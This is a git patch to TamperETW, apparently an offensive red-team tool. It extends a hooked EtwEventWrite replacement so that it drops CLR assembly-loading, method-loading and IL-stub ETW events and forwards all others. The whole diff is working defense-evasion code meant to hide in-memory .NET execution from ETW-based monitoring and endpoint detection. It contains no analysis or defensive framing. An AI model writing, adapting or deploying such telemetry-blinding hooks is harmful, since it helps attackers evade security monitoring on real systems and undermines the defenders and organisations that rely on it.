From d8c90b5c1e61a1df951f0a96ea777b1b626207dd Mon Sep 17 00:00:00 2001
From: Cn33liz <Cornelis@deplaa.com>
Date: Thu, 26 Mar 2020 21:38:54 +0100
Subject: [PATCH] Added more CLR ETW blocking rules

---
 TamperETW/UnmanagedCLR/TamperETW.cpp | 24 ++++++++++++++++++------
 1 file changed, 18 insertions(+), 6 deletions(-)

diff --git a/TamperETW/UnmanagedCLR/TamperETW.cpp b/TamperETW/UnmanagedCLR/TamperETW.cpp
index a78080d..ecebbe8 100755
--- a/TamperETW/UnmanagedCLR/TamperETW.cpp
+++ b/TamperETW/UnmanagedCLR/TamperETW.cpp
@@ -3,7 +3,12 @@
 #undef  UNICODE
 #define UNICODE
 
+// https://docs.microsoft.com/en-us/dotnet/framework/performance/etw-events-in-the-common-language-runtime
+#define ModuleLoad_V2 152
 #define AssemblyDCStart_V1 155
+#define MethodLoadVerbose_V1 143
+#define MethodJittingStarted 145
+#define ILStubGenerated 88
 
 #include <Windows.h>
 #include <stdio.h>
@@ -34,14 +39,21 @@ ULONG NTAPI MyEtwEventWrite(
 		return 1;
 	}
 
-	// Block CLR assembly loading events.
-	if (EventDescriptor->Id == AssemblyDCStart_V1) {
-		return uResult;
+	switch (EventDescriptor->Id) {
+	case AssemblyDCStart_V1:
+		// Block CLR assembly loading events.
+		break;
+	case MethodLoadVerbose_V1:
+		// Block CLR method loading events.
+		break;
+	case ILStubGenerated:
+		// Block MSIL stub generation events.
+		break;
+	default:
+		// Forward all other ETW events using EtwEventWriteFull.
+		uResult = EtwEventWriteFull(RegHandle, EventDescriptor, 0, NULL, NULL, UserDataCount, UserData);
 	}
 
-	// Forward all other ETW events using EtwEventWriteFull.
-	uResult = EtwEventWriteFull(RegHandle, EventDescriptor, 0, NULL, NULL, UserDataCount, UserData);
-
 	return uResult;
 }